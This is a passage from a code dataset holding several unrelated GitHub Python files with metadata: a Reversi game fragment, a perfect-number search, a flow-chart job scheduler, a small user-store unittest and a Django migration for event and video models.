np.reshape([board[i][j] for i in range(row - 1, row + 2) for j in range(col - 1, col + 2)], (3,3))\n\t\treturn rect\n\telif row == 0 and col not in (0, 7):\n\t\t# top-edge rect\n\t\trect = np.reshape([board[i][j] for i in range(row, row + 2) for j in range(col-1, col + 2)], (2,3))\n\t\trect = np.concatenate((np.array([[0.,0.,0.]]), rect))\n\t\treturn rect\n\telif row == 7 and col not in (0, 7):\n\t\t# bottom-edge rect\n\t\trect = np.reshape([board[i][j] for i in range(row - 1, row + 1) for j in range(col-1, col + 2)], (2,3))\n\t\trect = np.concatenate((rect, np.array([[0.,0.,0.]])))\n\t\treturn rect\n\telif col == 0 and row not in (0, 7):\n\t\t# left-edge rect\n\t\trect = np.reshape([board[i][j] for i in range(row - 1, row + 2) for j in range(col, col + 2)], (3,2))\n\t\trect = np.concatenate((np.array([[0.,0.,0.]]).T, rect), axis=1)\n\t\treturn rect\n\telif col == 7 and row not in (0, 7):\n\t\t# right-edge rect\n\t\trect = np.reshape([board[i][j] for i in range(row - 1, row + 2) for j in range(col-1, col + 1)], (3,2))\n\t\trect = np.concatenate((rect, np.array([[0.,0.,0.]]).T), axis=1)\n\t\treturn rect\n\telse:\n\t\t# corner: (0,0), (0,7), (7,0), (7,7)):\n\t\tif row == 0 and col == 0:\n\t\t\trect = np.reshape([board[i][j] for i in range(row, row + 2) for j in range(col, col + 2)], (2,2))\n\t\t\trect = np.pad(rect, pad_width=((1,0), (1,0)), mode='constant', constant_values=0)\n\t\telif row == 0 and col == 7:\n\t\t\trect = np.reshape([board[i][j] for i in range(row, row + 2) for j in range(col - 1, col + 1)], (2,2))\n\t\t\trect = np.pad(rect, pad_width=((1,0), (0,1)), mode='constant', constant_values=0)\n\t\telif row == 7 and col == 0:\n\t\t\trect = np.reshape([board[i][j] for i in range(row - 1, row + 1) for j in range(col, col + 2)], (2,2))\n\t\t\trect = np.pad(rect, pad_width=((0,1), (1,0)), mode='constant', constant_values=0)\n\t\telif row == 7 and col == 7:\n\t\t\trect = np.reshape([board[i][j] for i in range(row - 1, row + 1) for j in range(col - 1, col + 1)], (2,2))\n\t\t\trect = np.pad(rect, pad_width=((0,1), (0,1)), mode='constant', constant_values=0)\n\treturn rect\n\n# MAIN\nplay_game(board)\n", "repo_name": "allenhj/pyReversi", "sub_path": "reversi.py", "file_name": "reversi.py", "file_ext": "py", "file_size_in_byte": 17401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "termcolor.colored", "line_number": 9, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 10, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 11, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 12, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 48, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 50, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 51, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 53, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 57, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 59, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 61, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 64, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 65, "usage_type": "call"}, {"api_name": "termcolor.colored", 
"line_number": 70, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 71, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 74, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 80, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 83, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 84, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 95, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 108, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 116, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 116, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 199, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 208, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 208, "usage_type": "attribute"}, {"api_name": "termcolor.colored", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 211, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 216, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 217, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 218, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 219, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 221, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 222, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 225, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 226, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 227, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 228, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 229, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 231, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 232, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 236, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 237, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 245, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 246, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 247, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 248, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 317, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 361, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 414, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 418, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 419, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 419, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 424, 
"usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 428, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 429, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 429, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 434, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 434, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 439, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 440, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 443, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 445, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 448, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 449, "usage_type": "call"}]} +{"seq_id": "74670673443", "text": "# -*- coding: utf-8 -*-\r\n'''\r\nPerfect number 完全数\r\n2020年8月3日13:55:52\r\n彭寒冰\r\n'''\r\nimport json\r\n\r\ndef factorsum(num):\r\n self = num\r\n result = 1\r\n factor = 2\r\n exponent = 0\r\n i = 2\r\n while i * i <= num:\r\n if num % i == 0:\r\n if i == factor:\r\n exponent += 1\r\n else:\r\n result *= (factor ** (exponent + 1) - 1) // (factor - 1)\r\n factor = i\r\n exponent = 1\r\n num //= i\r\n else:\r\n i += 1\r\n if num == factor:\r\n result *= (factor ** (exponent + 2) - 1) // (factor -1)\r\n else:\r\n result *= (factor ** (exponent + 1) - 1) // (factor -1) * (1 + num)\r\n return result - self\r\n\r\nclass perfect_number:\r\n number = 2\r\n perfects = []\r\n\r\n @classmethod\r\n def load(cls):\r\n try:\r\n with open('perfect_number.json', encoding='utf-8') as file:\r\n save = json.load(file)\r\n except FileNotFoundError:\r\n pass\r\n else:\r\n cls.number = save['progress']\r\n cls.perfects = save['perfect_numbers']\r\n if cls.number in cls.perfects:\r\n cls.number += 1\r\n\r\n @classmethod\r\n def save(cls):\r\n with open('perfect_number.json', 'w', encoding='utf-8') as file:\r\n json.dump({'progress': cls.number,\r\n 'perfect_numbers': cls.perfects}, file)\r\n\r\n @classmethod\r\n def search(cls):\r\n cls.load()\r\n try:\r\n while True:\r\n if cls.number == factorsum(cls.number):\r\n cls.perfects.append(cls.number)\r\n cls.number += 1\r\n except KeyboardInterrupt:\r\n pass\r\n finally:\r\n cls.save()\r\n print(f'Searching reaches {cls.number}')\r\n print('Perfect numbers found:')\r\n print(*cls.perfects, sep=', ')\r\n\r\nif __name__ == '__main__':\r\n perfect_number.search()\r\n", "repo_name": "phbice/public_code", "sub_path": "Python/misc/perfect_number.py", "file_name": "perfect_number.py", "file_ext": "py", "file_size_in_byte": 1966, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 40, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "30812466497", "text": "import json\nimport os\nimport sys\nimport time\nimport traceback\nimport warnings\n\nimport matplotlib.cbook\nimport networkx as nx\nfrom flojoy import get_next_directions, get_next_nodes\n\nwarnings.filterwarnings(\"ignore\", category=matplotlib.cbook.mplDeprecation)\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(os.path.abspath(os.path.join(dir_path, os.pardir)))\n\nfrom 
services.job_service import JobService\nfrom utils.dynamic_module_import import get_module_func, create_map\nfrom utils.topology import Topology\n\nENV_CI = \"CI\"\n\n\nclass FlowScheduler:\n    def __init__(self, scheduler_job_id, fc, extraParams, jobsetId=None) -> None:\n        # print(\"sjid\", scheduler_job_id)\n        # print(\"fc\", fc)\n        # print(\"ep\", extraParams)\n        # print(\"jsid\", jobsetId)\n        self.scheduler_job_id = scheduler_job_id\n        self.jobset_id = jobsetId\n        self.flow_chart = fc\n        # TODO: split this up into different input vars\n        self.maximum_runtime = extraParams.get(\"maximumRuntime\", 3000)\n        self.node_delay = extraParams.get(\"nodeDelay\", 0)\n        self.job_service = JobService(\"flojoy\", self.maximum_runtime)\n\n    def run(self):\n        print(\"\\nrun jobset:\", self.jobset_id)\n        self.is_ci = os.getenv(key=ENV_CI, default=False)\n        print(\"is running in CI?\", self.is_ci)\n        self.nx_graph = reactflow_to_networkx(\n            self.flow_chart[\"nodes\"], self.flow_chart[\"edges\"]\n        )\n        self.topology = Topology(graph=self.nx_graph)\n        self.topology.print_id_to_label_mapping()\n        self.topology.print_graph()\n        self.topology.collect_ready_jobs()\n\n        num_times_waited_for_new_jobs = 0\n        wait_time_for_new_jobs = 0.1\n        wait_time_multiplier = 2\n        max_wait_time = 10\n\n        while not self.topology.finished():\n            print(\"\\nnext wave\")\n            # self.topology.print_graph()\n\n            try:\n                self.topology.collect_ready_jobs()\n                next_jobs = self.topology.next_jobs()\n\n                if len(next_jobs) == 0:\n                    wait_time_for_new_jobs = wait_time_for_new_jobs * pow(\n                        wait_time_multiplier, num_times_waited_for_new_jobs\n                    )\n                    wait_time_for_new_jobs = min(wait_time_for_new_jobs, max_wait_time)\n                    print(\n                        f\"no new jobs to execute, sleeping for {wait_time_for_new_jobs} sec\"\n                    )\n                    time.sleep(wait_time_for_new_jobs)\n                    num_times_waited_for_new_jobs += 1\n                    continue\n\n                # reset wait count\n                num_times_waited_for_new_jobs = 0\n\n                self.topology.print_jobq(\"ready \")\n\n                for job_id in next_jobs:\n                    self.run_job(job_id)\n\n                print(\"waiting on jobs enqueued\")\n                for job_id in next_jobs:\n                    job_result, success = self.wait_for_job(job_id)\n                    self.process_job_result(job_id, job_result, success)\n\n                self.topology.clear_jobq()\n\n            except Exception as e:\n                self.topology.print_graph(\n                    \"exception occurred in scheduler, current working graph:\"\n                )\n                print(traceback.format_exc())\n                raise e\n\n        # jobset finished\n        self.topology.print_graph()\n        self.notify_jobset_finished()\n        print(\"finished processing jobset\", self.jobset_id, \"\\n\")\n\n    def process_job_result(self, job_id, job_result, success):\n        \"\"\"\n        process special instructions to scheduler\n        \"\"\"\n\n        if not success:\n            self.topology.mark_job_failure(job_id)\n            return\n\n        # process instruction to flow through specified directions\n        for direction_ in get_next_directions(job_result):\n            direction = direction_.lower()\n            self.topology.mark_job_success(job_id, direction)\n\n        # process instruction to flow to specified nodes\n        nodes_to_add = []\n        next_nodes = get_next_nodes(job_result)\n        if next_nodes is not None:\n            nodes_to_add += [node_id for node_id in next_nodes]\n\n        if len(nodes_to_add) > 0:\n            print(\n                \" + adding nodes to graph:\",\n                [self.topology.get_label(n_id, original=True) for n_id in nodes_to_add],\n            )\n\n        for node_id in nodes_to_add:\n            print(\"OVER HERE\")\n            self.topology.restart(node_id)\n\n    def run_job(self, job_id):\n        node = self.nx_graph.nodes[job_id]\n        cmd = node[\"cmd\"]\n        cmd_mock = node[\"cmd\"] + \"_MOCK\"\n        func = get_module_func(cmd, cmd)\n        if self.is_ci:\n            try:\n                func = get_module_func(cmd, 
cmd_mock)\n            except Exception:\n                pass\n\n        dependencies = self.topology.get_job_dependencies(job_id, original=True)\n\n        print(\n            \"  enqueue job:\",\n            self.topology.get_label(job_id),\n            \"dependencies:\",\n            [self.topology.get_label(dep_id, original=True) for dep_id in dependencies],\n        )\n\n        self.job_service.enqueue_job(\n            func=func,\n            jobset_id=self.jobset_id,\n            job_id=job_id,\n            iteration_id=job_id,\n            ctrls=node[\"ctrls\"],\n            previous_job_ids=[],\n            input_job_ids=dependencies,\n        )\n\n    def wait_for_job(self, job_id):\n        print(\"  waiting for job:\", self.topology.get_label(job_id))\n\n        while True:\n            time.sleep(self.node_delay)\n\n            job = self.job_service.fetch_job(job_id=job_id)\n            if job:\n                job_status = job.get_status()\n\n                if job_status in [\"finished\", \"failed\"]:\n                    job_result = job.result\n                    success = True if job_status == \"finished\" else False\n                    print(\n                        \"  job:\", self.topology.get_label(job_id), \"status:\", job_status\n                    )\n                    break\n\n        return job_result, success\n\n    def notify_jobset_finished(self):\n        self.job_service.redis_dao.remove_item_from_list(\n            f\"{self.jobset_id}_watch\", self.scheduler_job_id\n        )\n\n    def print_flow_chart(self):\n        print(\n            \"nodes from FE:\",\n            json.dumps(self.flow_chart[\"nodes\"], indent=2),\n            \"\\nedges from FE:\",\n            json.dumps(self.flow_chart[\"edges\"], indent=2),\n        )\n\n\ndef reactflow_to_networkx(elems, edges):\n    nx_graph: nx.DiGraph = nx.DiGraph()\n    for i in range(len(elems)):\n        el = elems[i]\n        node_id = el[\"id\"]\n        data = el[\"data\"]\n        cmd = el[\"data\"][\"func\"]\n        ctrls = data[\"ctrls\"] if \"ctrls\" in data else {}\n        inputs = data[\"inputs\"] if \"inputs\" in data else {}\n        label = data[\"label\"] if \"label\" in data else {}\n        nx_graph.add_node(\n            node_id,\n            pos=(el[\"position\"][\"x\"], el[\"position\"][\"y\"]),\n            id=el[\"id\"],\n            ctrls=ctrls,\n            inputs=inputs,\n            label=label,\n            cmd=cmd,\n        )\n\n    for i in range(len(edges)):\n        e = edges[i]\n        _id = e[\"id\"]\n        u = e[\"source\"]\n        v = e[\"target\"]\n        label = e[\"sourceHandle\"]\n        nx_graph.add_edge(u, v, label=label, id=_id)\n\n    nx.draw(nx_graph, with_labels=True)\n\n    return nx_graph\n\n\ndef run(**kwargs):\n    try:\n        return FlowScheduler(**kwargs).run()\n    except Exception:\n        print(\"exception occurred while running the flowchart\")\n        print(traceback.format_exc())\n", "repo_name": "Ben-Epstein/studio", "sub_path": "PYTHON/WATCH/watch.py", "file_name": "watch.py", "file_ext": "py", "file_size_in_byte": 7607, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.cbook.cbook", "line_number": 12, "usage_type": "attribute"}, {"api_name": "matplotlib.cbook", "line_number": 12, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.pardir", "line_number": 15, "usage_type": "attribute"}, {"api_name": "services.job_service.JobService", "line_number": 36, "usage_type": "call"}, {"api_name": "os.getenv", 
"line_number": 40, "usage_type": "call"}, {"api_name": "utils.topology.Topology", "line_number": 45, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 71, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 94, "usage_type": "call"}, {"api_name": "flojoy.get_next_directions", "line_number": 112, "usage_type": "call"}, {"api_name": "flojoy.get_next_nodes", "line_number": 118, "usage_type": "call"}, {"api_name": "utils.dynamic_module_import.get_module_func", "line_number": 136, "usage_type": "call"}, {"api_name": "utils.dynamic_module_import.get_module_func", "line_number": 139, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 166, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 190, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 192, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 197, "usage_type": "attribute"}, {"api_name": "networkx.draw", "line_number": 224, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 234, "usage_type": "call"}]} +{"seq_id": "32473116481", "text": "from dataObject import Utilisateur,UtilisateurHelper,DbStore\nimport unittest\nimport logging\nimport logging.config\n\nclass DbData(unittest.TestCase):\n \n def test_utilisateur(self):\n \n self.dbStore = DbStore(\"192.168.1.27:27017\",\"MakerLoc\")\n helper = UtilisateurHelper(self.dbStore)\n helper.cleanAll()\n u1 = Utilisateur(\"delporte\",\"1234\",\"sdelporte@gmail.com\")\n u2 = Utilisateur(\"pol\",\"1234\",\"pol@gmail.com\")\n helper.store(u1)\n helper.secureStore(u2)\n helper.secureStore(u2)\n helper.lenght()\n u3 = helper.getOneByName(\"delporte\")\n assert u3 != None\n print(u3.toString())\n u1.cardId = \"789\"\n helper.updateAllField(u1)\n u3 = helper.getOneByName(\"delporte\")\n assert u3.cardId == \"789\" \n\n\n\n\nif __name__ == \"__main__\" : \n logging.config.fileConfig('logger.conf') \n unittest.main()", "repo_name": "pihito/MakerLoc", "sub_path": "app/unitTest.py", "file_name": "unitTest.py", "file_ext": "py", "file_size_in_byte": 907, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "dataObject.DbStore", "line_number": 10, "usage_type": "call"}, {"api_name": "dataObject.UtilisateurHelper", "line_number": 11, "usage_type": "call"}, {"api_name": "dataObject.Utilisateur", "line_number": 13, "usage_type": "call"}, {"api_name": "dataObject.Utilisateur", "line_number": 14, "usage_type": "call"}, {"api_name": "logging.config.fileConfig", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.config", "line_number": 31, "usage_type": "attribute"}, {"api_name": "unittest.main", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "14843743996", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Event',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('is_active', models.BooleanField(default=True, help_text='Whether this item is active, use this instead of deleting')),\n ('created_on', models.DateTimeField(help_text='When this item was originally created', 
auto_now_add=True)),\n                ('modified_on', models.DateTimeField(help_text='When this item was last modified', auto_now=True)),\n                ('date', models.DateField(help_text='The date when the event will occur')),\n                ('time', models.TimeField(help_text='The start time for the event')),\n                ('duration', models.IntegerField(help_text='The duration in minutes of the event')),\n                ('title', models.CharField(help_text='What is the title of this event', max_length=64)),\n                ('logo', models.ImageField(help_text='The image representing the event in general (should be square)', upload_to='photos/')),\n                ('description', models.TextField(help_text='More descriptively say about this event', max_length=256)),\n                ('venue', models.CharField(help_text='The exact location where event will take place', max_length=128)),\n                ('recurrence_type', models.CharField(blank=True, max_length=1, null=True, help_text='Does this event occur weekly or monthly', choices=[(b'W', b'Weekly'), (b'M', b'Monthly')])),\n                ('dow', models.IntegerField(null=True, blank=True)),\n                ('monthly_ordinal', models.IntegerField(null=True, blank=True)),\n                ('photo_tag', models.CharField(max_length=64, null=True, blank=True)),\n                ('end_date', models.DateField(help_text='Last date of recurrence', null=True, blank=True)),\n                ('created_by', models.ForeignKey(related_name='events_event_creations', on_delete=models.deletion.PROTECT, to=settings.AUTH_USER_MODEL, help_text='The user which originally created this item')),\n                ('modified_by', models.ForeignKey(related_name='events_event_modifications', on_delete=models.deletion.PROTECT, to=settings.AUTH_USER_MODEL, help_text='The user which last modified this item')),\n                ('parent', models.ForeignKey(related_name='children', on_delete=models.deletion.PROTECT, blank=True, to='events.Event', null=True)),\n            ],\n            options={\n                'abstract': False,\n            },\n            bases=(models.Model,),\n        ),\n        migrations.CreateModel(\n            name='Video',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('is_active', models.BooleanField(default=True, help_text='Whether this item is active, use this instead of deleting')),\n                ('created_on', models.DateTimeField(help_text='When this item was originally created', auto_now_add=True)),\n                ('modified_on', models.DateTimeField(help_text='When this item was last modified', auto_now=True)),\n                ('name', models.CharField(help_text='The name of the video', max_length=255)),\n                ('summary', models.TextField(help_text='A short blurb about the video')),\n                ('description', models.TextField(help_text='The full description for the video')),\n                ('youtube_id', models.CharField(help_text='The id youtube uses for this video', max_length=255)),\n                ('created_by', models.ForeignKey(related_name='events_video_creations', on_delete=models.deletion.PROTECT, to=settings.AUTH_USER_MODEL, help_text='The user which originally created this item')),\n                ('modified_by', models.ForeignKey(related_name='events_video_modifications', on_delete=models.deletion.PROTECT, to=settings.AUTH_USER_MODEL, help_text='The user which last modified this item')),\n            ],\n            options={\n                'abstract': False,\n            },\n            bases=(models.Model,),\n        ),\n    ]\n", "repo_name": "nyaruka/klab", "sub_path": "klab/events/migrations/0001_initial.py", "file_name": "0001_initial.py", "file_ext": "py", "file_size_in_byte": 4407, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 8, "usage_type": "attribute"}, {"api_name": 
"django.db.migrations", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.migrations.swappable_dependency", "line_number": 11, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.DateField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.TimeField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 31, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 31, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.models.DateField", "line_number": 33, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.models.deletion", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 34, "usage_type": "attribute"}, {"api_name": 
"django.conf.settings", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 35, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 35, "usage_type": "name"}, {"api_name": "django.db.models.deletion", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 35, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "django.db.models.deletion", "line_number": 36, "usage_type": "attribute"}, {"api_name": "django.db.models.Model", "line_number": 41, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 41, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 43, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 43, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 46, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 46, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 47, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 47, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 48, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 48, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 49, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 49, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 50, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 50, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 51, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 51, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 52, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 52, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 53, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 53, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 54, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 54, "usage_type": "name"}, {"api_name": "django.db.models.deletion", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 54, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 55, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 55, "usage_type": "name"}, {"api_name": "django.db.models.deletion", "line_number": 55, "usage_type": "attribute"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 55, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 55, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 60, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "27296483076", "text": "#!flask/bin/python\nimport json\nfrom flask import Flask, Response, request, jsonify, make_response\nimport requests\nfrom flaskrun 
